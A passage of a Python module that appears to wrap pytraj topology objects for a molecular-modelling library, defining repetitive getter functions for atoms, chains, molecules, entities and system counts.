return _get(tmp_item, indices=indices)
def get_n_chains_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_group (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_group as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## component
def get_index_from_component (item, indices='all', frame_indices='all'):
return get_component_index_from_component (item, indices=indices, frame_indices=frame_indices)
def get_id_from_component (item, indices='all', frame_indices='all'):
return get_component_id_from_component (item, indices=indices, frame_indices=frame_indices)
def get_name_from_component (item, indices='all', frame_indices='all'):
return get_component_name_from_component (item, indices=indices, frame_indices=frame_indices)
def get_type_from_component (item, indices='all', frame_indices='all'):
return get_component_type_from_component (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_component(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## molecule
def get_index_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_index_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_id_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_id_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_name_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_name_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_type_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_type_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## chain
def get_index_from_chain (item, indices='all', frame_indices='all'):
return get_chain_index_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_id_from_chain (item, indices='all', frame_indices='all'):
return get_chain_id_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_name_from_chain (item, indices='all', frame_indices='all'):
return get_chain_name_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_type_from_chain (item, indices='all', frame_indices='all'):
return get_chain_type_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## entity
def get_index_from_entity (item, indices='all', frame_indices='all'):
return get_entity_index_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_id_from_entity (item, indices='all', frame_indices='all'):
return get_entity_id_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_name_from_entity (item, indices='all', frame_indices='all'):
return get_entity_name_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_type_from_entity (item, indices='all', frame_indices='all'):
return get_entity_type_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## system
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_bonded_atoms_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_bonds_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_aminoacids_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_aminoacids_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_nucleotides_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_nucleotides_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_ions_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_ions_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_waters_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_waters_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_cosolutes_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_cosolutes_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_small_molecules_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_small_molecules_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_peptides_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_peptides_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_proteins_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_proteins_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_dnas_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_dnas_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_rnas_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_rnas_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_n_lipids_from_system(item, indices='all', frame_indices='all'):
    from .api_pytraj_Topology import get_n_lipids_from_system as _get
    tmp_item = to_pytraj_Topology(item)
    return _get(tmp_item, indices=indices)
def get_coordinates_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.xyz * 0.1 * unit.nanometers
    if frame_indices != 'all':
tmp_item = tmp_item[frame_indices,:,:]
